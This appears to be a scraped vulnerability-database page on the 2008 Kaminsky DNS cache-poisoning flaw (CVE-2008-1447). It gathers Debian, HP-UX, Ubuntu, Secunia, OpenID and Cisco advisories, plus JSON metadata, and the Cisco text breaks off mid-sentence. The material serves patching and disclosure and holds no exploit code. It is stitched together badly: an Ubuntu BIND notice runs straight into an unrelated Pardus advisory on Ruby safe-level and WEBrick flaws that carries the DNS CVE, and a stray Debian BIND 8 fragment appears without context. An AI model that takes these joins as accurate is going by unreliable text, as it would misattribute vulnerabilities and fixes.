    http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_i386.deb Size/MD5 checksum: 184546 1fbdd71e81a1e05d68b0f88eaeb00b10

    ia64 architecture (Intel ia64)

    http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_ia64.deb Size/MD5 checksum: 223758 011f283b71ef0f9e07d5a9dce25db505

    mips architecture (MIPS (Big Endian))

    http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_mips.deb Size/MD5 checksum: 189846 5c67cca2eaedc1dff80c5fd05aa1d33f

    mipsel architecture (MIPS (Little Endian))

    http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_mipsel.deb Size/MD5 checksum: 191824 dfd87d69a7751f1e6ef2d0f1ede052ff

    powerpc architecture (PowerPC)

    http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_powerpc.deb Size/MD5 checksum: 186890 93701abcca5421beddab015a7f35af99

    s390 architecture (IBM S/390)

    http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_s390.deb Size/MD5 checksum: 186396 6f19f6c8d803c3d57e01e73fe1e11886

    sparc architecture (Sun SPARC/UltraSPARC)

    http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_sparc.deb Size/MD5 checksum: 182910 f360078c14f715e90e60124b4ede2be9

    These files will probably be moved into the stable distribution on its next update. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c01506861 Version: 3

    HPSBUX02351 SSRT080058 rev.3 - HP-UX Running BIND, Remote DNS Cache Poisoning

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2008-07-16 Last Updated: 2008-08-06

    Potential Security Impact: Remote DNS cache poisoning

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX running BIND. HP-UX B.11.11, B.11.23, B.11.31 running BIND v9.3.2 or BIND v9.2.0, HP-UX B.11.11 running BIND v8.1.2

    BACKGROUND

    CVSS 2.0 Base Metrics

    Reference Base Vector Base Score CVE-2008-1447 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 =============================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

    RESOLUTION

    HP has provided the following software updates / patch to resolve the vulnerabilities for BIND v9.2.0 and BIND v9.3.2.

    Customers running BIND v8.1.2 on HP-UX B.11.11 should upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates listed below.

    The BIND v9.2.0 update is available for download from: ftp://ss080058:ss080058@hprc.external.hp.com

    The patch PHNE_37865 is available from: http://itrc.hp.com

    The BIND v9.3.2 updates are available for download from: http://software.hp.com

    HP-UX Release - B.11.11 running v8.1.2 Action - Upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates listed below

    HP-UX Release - B.11.11 running v9.2.0 BIND Depot name - BIND920v11.depot MD5 Sum - F6999280DE19645EF86FF52083AACD72

    HP-UX Release - B.11.23 running v9.2.0 Action - Install PHNE_37865

    HP-UX Release - B.11.11 running v9.3.2 Action - Install revision C.9.3.2.3.0 or subsequent

    HP-UX Release - B.11.23 running v9.3.2 Action - Install revision C.9.3.2.3.0 or subsequent

    HP-UX Release - B.11.31 running v9.3.2 Action - Install revision C.9.3.2.3.0 or subsequent

    Note: HP is aware of performance issues with these updates / patch. All customers should test the updates / patch in their environment. HP is investigating changes to reduce the performance issues. This bulletin will be revised when new updates / patch become available.

    MANUAL ACTIONS: Yes - NonUpdate For B.11.11 running v8.1.2, upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates For B.11.11 running v9.2.0 install BIND920v11.depot

    PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

    AFFECTED VERSIONS

    For BIND v8.1.2 HP-UX B.11.11 ============= InternetSrvcs.INETSVCS-RUN action: upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates

    For BIND v9.3.2 HP-UX B.11.11 ============= BindUpgrade.BIND-UPGRADE action: install revision C.9.3.2.3.0 or subsequent URL: http://software.hp.com

    HP-UX B.11.23

    BindUpgrade.BIND-UPGRADE BindUpgrade.BIND2-UPGRADE action: install revision C.9.3.2.3.0 or subsequent URL: http://software.hp.com

    HP-UX B.11.31

    NameService.BIND-AUX NameService.BIND-RUN action: install revision C.9.3.2.3.0 or subsequent URL: http://software.hp.com

    For BIND v9.2.0 HP-UX B.11.11 ============= BINDv920.INETSVCS-BIND action: install revision B.11.11.01.011 or subsequent URL: ftp://ss080058:ss080058@hprc.external.hp.com

    HP-UX B.11.23

    InternetSrvcs.INETSVCS-INETD InternetSrvcs.INETSVCS-RUN InternetSrvcs.INETSVCS2-RUN action: install patch PHNE_37865 or subsequent URL: http://itrc.hp.com

    END AFFECTED VERSIONS

    HISTORY Version:1 (rev.1) - 16 July 2008 Initial release Version:2 (rev.2) - 19 July 2008 Added BIND v9.2.0 depot information Version:3 (rev.3) - 06 August 2008 Updated patch location, revised BIND v9.2.0 depot information, added BIND v8.1.2

    Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For further information, contact normal HP Services support channel.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key

    Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

    To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

    To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

    • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

    GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault

    System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

    "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin.

    Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. =========================================================== Ubuntu Security Notice USN-622-1 July 08, 2008 bind9 vulnerability CVE-2008-1447 ===========================================================

    A security issue affects the following Ubuntu releases:

    Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS

    This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

    The problem can be corrected by upgrading your system to the following package versions:

    Ubuntu 6.06 LTS: libdns21 1:9.3.2-2ubuntu1.5

    Ubuntu 7.04: libdns22 1:9.3.4-2ubuntu2.3

    Ubuntu 7.10: libdns32 1:9.4.1-P1-3ubuntu2

    Ubuntu 8.04 LTS: libdns35 1:9.4.2-10ubuntu0.1

    In general, a standard system upgrade is sufficient to effect the necessary changes.

    Details follow:

    Dan Kaminsky discovered weaknesses in the DNS protocol as implemented by Bind.

    Description

    == Several vulnerabilities in safe level ==

    Multiple errors in the implementation of safe level restrictions can be exploited to call "untrace_var()", perform syslog operations, and modify "$PROGRAM_NAME" at safe level 4, or call insecure methods at safe levels 1 through 3.

    (These vulnerabilities were reported by Keita Yamaguchi.)

    == DoS vulnerability in WEBrick ==

    An error exists in the usage of regular expressions in "WEBrick::HTTPUtils.split_header_value()". This can be exploited to consume large amounts of CPU via a specially crafted HTTP request.

    (This vulnerability was reported by Christian Neukirchen.)

    == Lack of taintness check in dl ==

    An error in "DL" can be exploited to bypass security restrictions and call potentially dangerous functions.

    (This vulnerability was reported by Tanaka Akira.)

    Affected packages:

    Pardus 2008: ruby, all before 1.8.7_p72-16-4 ruby-mode, all before 1.8.7_p72-16-4

    Pardus 2007: ruby, all before 1.8.7_p72-16-13 ruby-mode, all before 1.8.7_p72-16-4

    Resolution

    There are update(s) for ruby, ruby-mode. You can update them via Package Manager or with a single command from console:

    Pardus 2008: pisi up ruby ruby-mode

    Pardus 2007: pisi up ruby ruby-mode

    References

    • http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby
    • http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447
    • http://secunia.com/advisories/31430/

    -- Pınar Yanardağ http://pinguar.org


    Full-Disclosure - We believe in it. There are two ways to deal with this situation:

    1. The documentation included with BIND 9 contains a migration guide. Configure the BIND 8 resolver to forward queries to a BIND 9 resolver. Provided that the network between both resolvers is trusted, this protects the BIND 8 resolver from cache poisoning attacks (to the same degree that the BIND 9 resolver is protected). It is theoretically possible to safely use BIND 8 in this way, but updating to BIND 9 is strongly recommended. BIND 8 (that is, the bind package) will be removed from the etch distribution in a future point release. Scott Kitterman noted that python-dns is vulnerable to this predictability, as it randomizes neither its transaction ID nor its source port. Taken together, this lack of entropy leaves applications using python-dns to perform DNS queries highly susceptible to response forgery.

    Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure.

    The Full Featured Secunia Network Software Inspector (NSI) is now available: http://secunia.com/network_software_inspector/

    The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications.


    TITLE: Red Hat update for bind

    SECUNIA ADVISORY ID: SA26195

    VERIFY ADVISORY: http://secunia.com/advisories/26195/

    CRITICAL: Moderately critical

    IMPACT: Spoofing

    WHERE:

    From remote

    OPERATING SYSTEM: Red Hat Enterprise Linux (v. 5 server) http://secunia.com/product/13652/ Red Hat Enterprise Linux Desktop (v. 5 client) http://secunia.com/product/13653/ Red Hat Enterprise Linux Desktop Workstation (v. 5 client) http://secunia.com/product/13651/ RedHat Enterprise Linux AS 2.1 http://secunia.com/product/48/ RedHat Enterprise Linux AS 3 http://secunia.com/product/2534/ RedHat Enterprise Linux AS 4 http://secunia.com/product/4669/ RedHat Enterprise Linux ES 2.1 http://secunia.com/product/1306/ RedHat Enterprise Linux ES 3 http://secunia.com/product/2535/ RedHat Enterprise Linux ES 4 http://secunia.com/product/4668/ RedHat Enterprise Linux WS 3 http://secunia.com/product/2536/ RedHat Enterprise Linux WS 2.1 http://secunia.com/product/1044/ RedHat Enterprise Linux WS 4 http://secunia.com/product/4670/ RedHat Linux Advanced Workstation 2.1 for Itanium http://secunia.com/product/1326/

    DESCRIPTION: Red Hat has issued an update for bind.

    For more information: SA26152

    SOLUTION: Updated packages are available from Red Hat Network. http://rhn.redhat.com

    ORIGINAL ADVISORY: http://rhn.redhat.com/errata/RHSA-2007-0740.html

    OTHER REFERENCES: SA26152: http://secunia.com/advisories/26152/


    About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

    Subscribe: http://secunia.com/secunia_security_advisories/

    Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

    Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Security Advisory (08-AUG-2008) (CVE-2008-3280) ===============================================

    Ben Laurie of Google's Applied Security team, while working with an external researcher, Dr. Richard Clayton of the Computer Laboratory, Cambridge University, found that various OpenID Providers (OPs) had TLS Server Certificates that used weak keys, as a result of the Debian Predictable Random Number Generator (CVE-2008-0166).

    In combination with the DNS Cache Poisoning issue (CVE-2008-1447) and the fact that almost all SSL/TLS implementations do not consult CRLs (currently an untracked issue), this means that it is impossible to rely on these OPs.

    Attack Description

    In order to mount an attack against a vulnerable OP, the attacker first finds the private key corresponding to the weak TLS certificate. He then sets up a website masquerading as the original OP, both for the OpenID protocol and also for HTTP/HTTPS.

    There are two cases, one is where the victim is a user trying to identify themselves, in which case, even if they use HTTPS to "ensure" that the site they are visiting is indeed their provider, they will be unable to detect the substitution and will give their login credentials to the attacker.

    The second case is where the victim is the Relying Party (RP). In this case, even if the RP uses TLS to connect to the OP, as is recommended for higher assurance, he will not be defended, as the vast majority of OpenID implementations do not check CRLs, and will, therefore, accept the malicious site as the true OP.

    Mitigation

    Mitigation is surprisingly hard. In theory the vulnerable site should revoke their weak certificate and issue a new one.

    However, since the CRLs will almost certainly not be checked, this means the site will still be vulnerable to attack for the lifetime of the certificate (and perhaps beyond, depending on user behaviour). Note that shutting down the site DOES NOT prevent the attack.

    Therefore mitigation falls to other parties.

    1. Browsers must check CRLs by default.

    2. OpenID libraries must check CRLs.

    3. Until either 1 and 2 or 3 have been done, OpenID cannot be trusted for any OP that cannot demonstrate it has never had a weak certificate.

    Discussion

    Normally, when security problems are encountered with a single piece of software, the responsible thing to do is to is to wait until fixes are available before making any announcement. However, as a number of examples in the past have demonstrated, this approach does not work particularly well when many different pieces of software are involved because it is necessary to coordinate a simultaneous release of the fixes, whilst hoping that the very large number of people involved will cooperate in keeping the vulnerability secret.

    In the present situation, the fixes will involve considerable development work in adding CRL handling to a great many pieces of openID code. This is a far from trivial amount of work.

    The fixes will also involve changes to browser preferences to ensure that CRLs are checked by default -- which many vendors have resisted for years. We are extremely pessimistic that a security vulnerability in OpenID will be seen as sufficiently important to change the browser vendors minds.

    Hence, we see no value in delaying this announcement; and by making the details public as soon as possible, we believe that individuals who rely on OpenID will be better able to take their own individual steps to avoid relying upon the flawed certificates we have identified.

    OpenID is at heart quite a weak protocol, when used in its most general form[1], and consequently there is very limited reliance upon its security. This means that the consequences of the combination of attacks that are now possible is nothing like as serious as might otherwise have been the case.

    However, it does give an insight into the type of security disaster that may occur in the future if we do not start to take CRLs seriously, but merely stick them onto "to-do" lists or disable them in the name of tiny performance improvements.

    Affected Sites

    There is no central registry of OpenID systems, and so we cannot be sure that we have identified all of the weak certificates that are currently being served. The list of those we have found so far is:

    openid.sun.com www.xopenid.net openid.net.nz

    Notes

    [1] There are ways of using OpenID that are significantly more secure than the commonly deployed scheme, I shall describe those in a separate article.


    Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "debian gnu linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "internet consortium",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "openwall gnu linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "red hat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "suse linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "ubuntu",
            "version": null
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "isc",
            "version": "8"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "isc",
            "version": "4"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "isc",
            "version": "9.2.9"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "alcatel lucent",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "apple computer",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "blue coat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "bluecat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "f5",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "force10",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "funkwerk",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gentoo linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "infoblox",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mandriva",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nixu",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nominum",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "novell",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openbsd",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "qnx",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "secure computing network security division",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "slackware linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "wind river",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "dnsmasq",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#800113"
          },
          {
            "db": "CERT/CC",
            "id": "VU#252735"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-1447"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Debian",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "68691"
          },
          {
            "db": "PACKETSTORM",
            "id": "68037"
          },
          {
            "db": "PACKETSTORM",
            "id": "68546"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2008-1447",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2008-1447",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "VHN-31572",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.2,
                "id": "CVE-2008-1447",
                "impactScore": 4.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2008-1447",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#800113",
                "trust": 0.8,
                "value": "27.54"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#252735",
                "trust": 0.8,
                "value": "3.83"
              },
              {
                "author": "VULHUB",
                "id": "VHN-31572",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#800113"
          },
          {
            "db": "CERT/CC",
            "id": "VU#252735"
          },
          {
            "db": "VULHUB",
            "id": "VHN-31572"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-1447"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "The DNS protocol, as implemented in (1) BIND 8 and 9 before 9.5.0-P1, 9.4.2-P1, and 9.3.5-P1; (2) Microsoft DNS in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2; and other implementations allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka \"DNS Insufficient Socket Entropy Vulnerability\" or \"the Kaminsky bug.\". Deficiencies in the DNS protocol and common DNS implementations facilitate DNS cache poisoning attacks. ISC (Internet Systems Consortiuim) BIND generates cryptographically weak DNS query IDs which could allow a remote attacker to poison DNS caches. In IP NAT filtering in Sun Solaris 10 and OpenSolaris series products, when a DNS server runs NAT, it incorrectly changes the original address of the data packet. When the destination address is a DNS port, it will allow remote attackers to bypass CVE-2008 -1447 security protection. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nCisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache\nPoisoning Attacks\n\nAdvisory ID: cisco-sa-20080708-dns\n\nhttp://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml\n\nRevision 1.0\n\nFor Public Release 2008 July 08 1800 UTC (GMT)\n\nSummary\n=======\n\nMultiple Cisco products are vulnerable to DNS cache poisoning attacks\ndue to their use of insufficiently randomized DNS transaction IDs and\nUDP source ports in the DNS queries that they produce, which may allow\nan attacker to more easily forge DNS answers that can poison DNS caches. \n\nTo exploit this vulnerability an attacker must be able to cause a\nvulnerable DNS server to perform recursive DNS queries. Therefore, DNS\nservers that are only authoritative, or servers where recursion is not\nallowed, are not affected. \n\nCisco has released free software updates that address this vulnerability. \n\nThis advisory is posted at\nhttp://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml. \n\nThis security advisory is being published simultaneously with\nannouncements from other affected organizations. \nProducts that process DNS messages with the RD flag set will attempt to\nanswer the question asked on behalf of the client. A product is only\naffected if using a vulnerable implementation of the DNS protocol, the\nDNS server functionality for the product is enabled, and the DNS feature\nfor the product is configured to process recursive DNS query messages. \n\nVulnerable Products\n+------------------\n\nThe following Cisco products are capable of acting as DNS servers and\nhave been found to have the DNS implementation weakness that makes some\ntypes of DNS cache poisoning attacks more likely to succeed:\n\n  * Cisco IOS Software\n\n    A device that is running Cisco IOS Software will be affected if it\n    is running a vulnerable version and if it is acting as a DNS server. \n\n    All Cisco IOS Software releases that support the DNS server\n    functionality and that have not had their DNS implementation\n    improved are affected. For information about specific fixed\n    versions, please refer to the Software Versions and Fixes section. \n\n    A device that is running Cisco IOS Software is configured to act\n    as a DNS server if the command \"ip dns server\" is present in the\n    configuration. This command is not enabled by default. \n\n  * Cisco Network Registrar\n\n    All Cisco Network Registrar versions are affected, and DNS services\n    are enabled by default. \n\n    The DNS server on CNR is enabled via the command-line interface\n    (CLI) commands \"server dns enable start-on-reboot\" or \"dns enable\n    start-on-reboot\" or via the web management interface in the Servers\n    page by selecting the appropriate \"Start,\" \"Stop,\" or \"Reload\"\n    button. \n\n  * Cisco Application and Content Networking System\n\n    All Cisco Application and Content Networking System (ACNS) versions\n    are affected; DNS services are disabled by default. \n\n    ACNS is configured to act as a DNS server if the command\n    \"dns enable\" is present in the configuration. \n\n  * Cisco Global Site Selector Used in Combination with Cisco Network\n    Registrar\n\n    The Cisco Global Site Selector (GSS) is affected when it is used in\n    combination with Cisco Network Registrar software to provide a more\n    complete DNS solution. Fixed software would come in the form of an\n    update of the Cisco Network Registrar software rather than an update\n    of the GSS software. \n\nProducts Confirmed Not Vulnerable\n+--------------------------------\n\nProducts that do not offer DNS server capabilities are not affected by\nthis vulnerability. \n\nThe Cisco GSS by itself is not affected by this vulnerability. However,\nit is affected when it is used with Cisco Network Registrar software. \n\nNo other Cisco products are currently known to be affected by these\nvulnerabilities. \n\nDetails\n=======\n\nThe Domain Name System is an integral part of networks that are based\non TCP/IP such as the Internet. Simply stated, the Domain Name System\nis a hierarchical database that contains mappings of hostnames and IP\naddresses. When handling\na query from a DNS client, a DNS server can look into its portion of the\nglobal DNS database (if the query is for a portion of the DNS database\nfor which the DNS server is authoritative), or it can relay the query\nto other DNS servers (if it is configured to do so and if the query\nis for a portion of the DNS database for which the DNS server is not\nauthoritative.)\n\nBecause of the processing time and bandwidth that is associated with\nhandling a DNS query, most DNS servers locally store responses that\nare received from other DNS servers. The area where these responses\nare stored locally is called a \"cache.\" Once a response is stored in a\ncache, the DNS server can use the locally stored response for a certain\ntime (called the \"time to live\") before having to query DNS servers\nagain to refresh the local (cached) copy of the response. For\nexample, if www.example.com is mapped to the IP address 192.168.0.1\nand this mapping is present in the cache of a DNS server, an attacker\nwho succeeds in poisoning the DNS cache of this server may be able to\nmap www.example.com to 10.0.0.1 instead. If this happens, a user who\nis trying to visit www.example.com may end up contacting the wrong web\nserver. The fundamental implementation\nweakness is that the DNS transaction ID and source port number used to\nvalidate DNS responses are not sufficiently randomized and can easily\nbe predicted, which allows an attacker to create forged responses to\nDNS queries that will match the expected values. The DNS server will\nconsider such responses to be valid. \n\nThe following Cisco products that offer DNS server functionality have\nbeen found to be susceptible to DNS cache poisoning attacks:\n\n  * Cisco IOS Software: The vulnerability documented in Cisco bug ID\n    CSCso81854. \n\n  * Cisco Network Registrar: The vulnerability documented in Cisco\n    bug ID CSCsq01298. \n\n  * Cisco Application and Content Networking System (ACNS): The\n    vulnerability documented in Cisco bug ID CSCsq21930. \n\nThis vulnerability has been assigned Common Vulnerabilities and\nExposures (CVE) ID CVE-2008-1447. \n\nVulnerability Scoring Details\n+----------------------------\n\nCisco has provided scores for the vulnerabilities in this advisory based\non the Common Vulnerability Scoring System (CVSS). The CVSS scoring in\nthis Security Advisory is done in accordance with CVSS version 2.0. \n\nCVSS is a standards-based scoring method that conveys vulnerability\nseverity and helps determine urgency and priority of response. \n\nCisco has provided a base and temporal score. Customers can then\ncompute environmental scores to assist in determining the impact of the\nvulnerability in individual networks. \n\nCisco has provided an FAQ to answer additional questions regarding CVSS\nat\n\nhttp://www.cisco.com/web/about/security/intelligence/cvss-qandas.html\n\nCisco has also provided a CVSS calculator to help compute the\nenvironmental impact for individual networks at\n\nhttp://intellishield.cisco.com/security/alertmanager/cvss\n\nCisco Bugs:\n\n* DNS cache prone to poisoning/forged answers attacks (CSCsq21930)\n\n* DNS susceptible to forged query response attacks (CSCsq01298)\n\n* Need to make DNS implementation more resilient against forged answers\n(CSCso81854)\n\nCVSS Base Score - 6.4\n    Access Vector -            Network\n    Access Complexity -        Low\n    Authentication -           None\n    Confidentiality Impact -   None\n    Integrity Impact -         Partial\n    Availability Impact -      